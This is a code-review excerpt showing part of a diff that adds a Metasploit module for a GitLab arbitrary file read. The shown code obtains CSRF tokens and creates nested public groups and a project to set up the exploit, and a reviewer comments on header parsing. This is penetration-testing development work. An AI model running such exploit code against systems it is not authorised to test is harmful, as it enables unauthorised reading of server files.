modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb

```diff
@@ -0,0 +1,229 @@
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path)
+    })
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Respones Code (response code: #{res.code})") unless res.code == 200
+    csrf_token = get_csrf(res.body)
+    vprint_good("CSRF Token: #{csrf_token}")
+
+    # create nested groups to the appropriate depth
+    print_status("Creating #{datastore['DEPTH']} groups")
+    parent_id = ''
+    first_group = ''
+    (1..datastore['DEPTH']).each do |_|
+      name = Rex::Text.rand_text_alphanumeric(8, 10)
+      first_group = name if first_group.empty?
+      vprint_status("Creating group: #{name} with parent id: #{parent_id}")
+      # a success will give a 302 and direct us to /<group_name>
+      res = send_request_cgi!({
+        'uri' => normalize_uri(target_uri.path, 'groups'),
+        'method' => 'POST',
+        'vars_post' => {
+          'group[parent_id]' => parent_id,
+          'group[name]' => name,
+          'group[path]' => name,
+          'group[visibility_level]' => 20,
+          'user[role]' => 'software_developer',
+          'group[jobs_to_be_done]' => '',
+          'authenticity_token' => csrf_token
+        }
+      })
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Respones Code (response code: #{res.code})") unless res.code == 200
+      csrf_token = get_csrf(res.body)
+      vprint_good("CSRF Token: #{csrf_token}")
+
+      # grab our parent group ID for nesting
+      res.body =~ /data-clipboard-text="([^"]+)" type="button" title="Copy group ID"/
+      parent_id = ::Regexp.last_match(1)
+    end
+
+    # create a new project
+
+    project_name = Rex::Text.rand_text_alphanumeric(8, 10)
+    print_status("Creating project #{project_name}")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'projects'),
+      'method' => 'POST',
+      'vars_post' => {
+        'project[ci_cd_only]' => 'false',
+        'project[name]' => project_name,
+        'project[selected_namespace_id]' => parent_id,
+        'project[namespace_id]' => parent_id,
+        'project[path]' => project_name,
+        'project[visibility_level]' => 20,
+        'project[initialize_with_readme]' => 1, # The POC is missing a ] here, fingerprintable?
+        'authenticity_token' => csrf_token
+      }
+    })
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Respones Code (response code: #{res.code})") unless res.code == 302
+    csrf_token = get_csrf(res.body)
+
+    project_id = res.headers['Location'].to_s.split('/')[3..].join('/') # strip off http[s]://ip/, seems like there should be a better way to do this though
```

Comment:
This assumes that the Location header will contain at least 3 `/`'s which may not be the case if its something like `https://www.google.com`